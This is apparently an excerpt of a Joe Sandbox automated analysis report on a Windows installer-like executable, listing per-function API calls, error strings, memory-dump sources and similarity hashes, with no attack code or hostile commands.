                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00878770,00000000,00000000,00000000,00000000,00000000), ref: 008A4925
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A490D: GetLastError.KERNEL32(?,?,?,00878770,00000000,00000000,00000000,00000000,00000000), ref: 008A492F
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,008A5C09,?,?,?,?,?,?,?,00010000,?), ref: 008A63C0
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,008A5C09,?,?,?,?), ref: 008A6412
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008A6458
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008A647E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$Write$Pointer
                                                                                                                                                                                                                                                                                                  • String ID: dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 133221148-2067379296
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3d0dc9c65b46c434f39a9566913ef17175ee69673586e97789b129333885ada6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ca4666d3273da414e53aa799310baae6a16693f73a65ba3935c11458601fb99
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d0dc9c65b46c434f39a9566913ef17175ee69673586e97789b129333885ada6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3241BD7290122ABFFF218E94CC45BAA7B68FF09720F184225FD00E6590E371DC20DBA4
                                                                                                                                                                                                                                                                                                  Function 0088AD44 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 0088ADB3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to extract payload: %ls from container: %ls, xrefs: 0088AE3E
                                                                                                                                                                                                                                                                                                  • Failed to extract all payloads from container: %ls, xrefs: 0088ADF7
                                                                                                                                                                                                                                                                                                  • Failed to open container: %ls., xrefs: 0088AD85
                                                                                                                                                                                                                                                                                                  • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 0088AE4A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-3891707333
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d34ec1fe97409011a8b6072c0d5d5fdb6bf0da475016ff1a53ebdb00b7ea364
                                                                                                                                                                                                                                                                                                  • Instruction ID: a5549f3e4b028327c4f8cd29acf46d9c46fb550e45b5de99d7e07f86e2c650d7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d34ec1fe97409011a8b6072c0d5d5fdb6bf0da475016ff1a53ebdb00b7ea364
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4331E432C00219ABDF21BAE8CC46EDE7768FF04710F114512F910E66D1E731AA14DBE2
                                                                                                                                                                                                                                                                                                  Function 0086F005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,00870654,00000001,00000001,00000001,00870654,00000000), ref: 0086F07D
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,00870654,00000001,00000001,00000001,00870654,00000000,00000001,00000000,?,00870654,00000001), ref: 0086F09A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format key for update registration., xrefs: 0086F033
                                                                                                                                                                                                                                                                                                  • Failed to remove update registration key: %ls, xrefs: 0086F0C7
                                                                                                                                                                                                                                                                                                  • PackageVersion, xrefs: 0086F05E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                                                                                                                                                                                                                                                  • API String ID: 446873843-3222553582
                                                                                                                                                                                                                                                                                                  • Opcode ID: 909c89d4f45232c807644354149f98bf5ceffa15d77209df275cf7595d38b0dd
                                                                                                                                                                                                                                                                                                  • Instruction ID: fe0be8a114536548c97d5fa361e98650fb48d29e380b0fab049c8b1f296b7118
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 909c89d4f45232c807644354149f98bf5ceffa15d77209df275cf7595d38b0dd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D218635900529BBDB219BA9DC49FAEBEB8FF05720F110275F914E2152E7359A40CA92
                                                                                                                                                                                                                                                                                                  Function 008A433D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindFirstFileW.KERNEL32(0088923A,?,00000100,00000000,00000000), ref: 008A447B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindClose.KERNEL32(00000000), ref: 008A4487
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 008A4430
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A1217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008A123F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A1217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,008770E8,00000100,000000B0,00000088,00000410,000002C0), ref: 008A1276
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseFindQueryValue$FileFirstOpen
                                                                                                                                                                                                                                                                                                  • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3397690329-3978359083
                                                                                                                                                                                                                                                                                                  • Opcode ID: 469c8f3ce63db4ded039a421f05abc7ebecf5a9778d76d6f17f10984df01b2dd
                                                                                                                                                                                                                                                                                                  • Instruction ID: ce314f248b24d5a69c9ac8d4313996a1873db4a79e83d00ddf4089c4a47d9bc5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 469c8f3ce63db4ded039a421f05abc7ebecf5a9778d76d6f17f10984df01b2dd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C131E231902209EBEF20AF88CC41EBEB774FF85710F14907AE901EA941E3B19E40CB54
                                                                                                                                                                                                                                                                                                  Function 008A4019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,00864DBC,00000000,?,?,00000000,?,008A412D,00000000,00864DBC,00000000,00000000,?,008785EE,?,?), ref: 008A4033
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A412D,00000000,00864DBC,00000000,00000000,?,008785EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008A4041
                                                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,00864DBC,00000000,00864DBC,00000000,?,008A412D,00000000,00864DBC,00000000,00000000,?,008785EE,?,?,00000001), ref: 008A40AC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A412D,00000000,00864DBC,00000000,00000000,?,008785EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008A40B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CopyErrorFileLast
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 374144340-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3b72102354227f1cffbcb6d3ba1dc35bf38c5e92a317610c9102b2f6e551ed75
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0fde7b2b9dab0a71a8e14b0accb4f2075a8faff19429432a03bb141342fd5cf1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b72102354227f1cffbcb6d3ba1dc35bf38c5e92a317610c9102b2f6e551ed75
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91210736600B3697FF700AA94C40B3B6A98FF93B60B156136FF05DB911E7E18C40A2E1
                                                                                                                                                                                                                                                                                                  Function 0086EF1B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086EF56
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4153: SetFileAttributesW.KERNEL32(0088923A,00000080,00000000,0088923A,000000FF,00000000,?,?,0088923A), ref: 008A4182
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4153: GetLastError.KERNEL32(?,?,0088923A), ref: 008A418C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0086EFA1,00000001,00000000,00000095,00000001,00870663,00000095,00000000,swidtag,00000001), ref: 00863C88
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • swidtag, xrefs: 0086EF65
                                                                                                                                                                                                                                                                                                  • Failed to allocate regid folder path., xrefs: 0086EFBC
                                                                                                                                                                                                                                                                                                  • Failed to allocate regid file path., xrefs: 0086EFB5
                                                                                                                                                                                                                                                                                                  • Failed to format tag folder path., xrefs: 0086EFC3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesDirectoryErrorFileLastOpen@16Remove
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
                                                                                                                                                                                                                                                                                                  • API String ID: 1428973842-4170906717
                                                                                                                                                                                                                                                                                                  • Opcode ID: fa393b3121cd331dea08ad3932a1032115fa72d680c66f492524ff51b16de484
                                                                                                                                                                                                                                                                                                  • Instruction ID: 544f305f12ec01f4b9a98bc85b9fc2767e9e2a54d1d4976b40ab2df96cf4fbb4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa393b3121cd331dea08ad3932a1032115fa72d680c66f492524ff51b16de484
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0217635D00518FBDF11EB99CC41AAEFBB5FF44710F1280A6F414FA2A1DB719A81AB91
                                                                                                                                                                                                                                                                                                  Function 00888DB6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 00888E3A
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0086F7E0,00000001,00000100,000001B4,00000000), ref: 00888E88
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to enumerate uninstall key for related bundles., xrefs: 00888E99
                                                                                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00888DD7
                                                                                                                                                                                                                                                                                                  • Failed to open uninstall registry key., xrefs: 00888DFD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCompareOpenString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                                  • API String ID: 2817536665-2531018330
                                                                                                                                                                                                                                                                                                  • Opcode ID: bf451b90c1c15cdd60d16a60f1fcd31ba65542b02d081e1bdc9567b2ebb43ec9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 758e8440697e4481c73766b7f4daa81089e5ed19734ec1f951064274c0348eff
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf451b90c1c15cdd60d16a60f1fcd31ba65542b02d081e1bdc9567b2ebb43ec9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2218336900228FEEB21BA94CC46BEEBA69FF00720F644664F510F6150DB755E90E791
                                                                                                                                                                                                                                                                                                  Function 008A32F3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 008A3309
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A3325
                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 008A33AC
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A33B7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 760788290-1270936966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1c35b0ae8191497160828fd4c3d6bba784d2ecc2e124fff3776e4f75acfb6206
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1eda035b73a3004442071122a1e2da00538793569315f54b8d9a1d7ebb442098
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c35b0ae8191497160828fd4c3d6bba784d2ecc2e124fff3776e4f75acfb6206
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83217E31905219AFDF119B94D848EAEBBB9FF46715F1501A8F901EB710DB319E008B90
                                                                                                                                                                                                                                                                                                  Function 0088D259 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0088D2EE
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 0088D31C
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 0088D325
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 944053411-3611226795
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1f9cecdb208fb1ebc7dabc3e7d00256148b6c2dec554ff2447bb8b07e7a8ae04
                                                                                                                                                                                                                                                                                                  • Instruction ID: 97ed14763ba87cf1228e8ba2b383838db716e7168b6e77cd4588a7313790bcc4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f9cecdb208fb1ebc7dabc3e7d00256148b6c2dec554ff2447bb8b07e7a8ae04
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6921B2B460070AFFDB10AF68D845A99BBF5FF48324F108629F964E7392C771E9508B91
                                                                                                                                                                                                                                                                                                  Function 008A5907 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,00886B11,00000000,?), ref: 008A591D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00886B11,00000000,?,?,?,?,?,?,?,?,?,00886F28,?,?), ref: 008A592B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00886B11,00000000,?), ref: 008A5965
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00886B11,00000000,?,?,?,?,?,?,?,?,?,00886F28,?,?), ref: 008A596F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: svcutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 355237494-1746323212
                                                                                                                                                                                                                                                                                                  • Opcode ID: 21ce8758add20a2a22dadaf2113e4a44f78fca9ebcdd8fe5eaf1c5dd09bf538b
                                                                                                                                                                                                                                                                                                  • Instruction ID: b572a9655fdd0dec5efba79e25d74537513d63a978fdab0cc46204652094178a
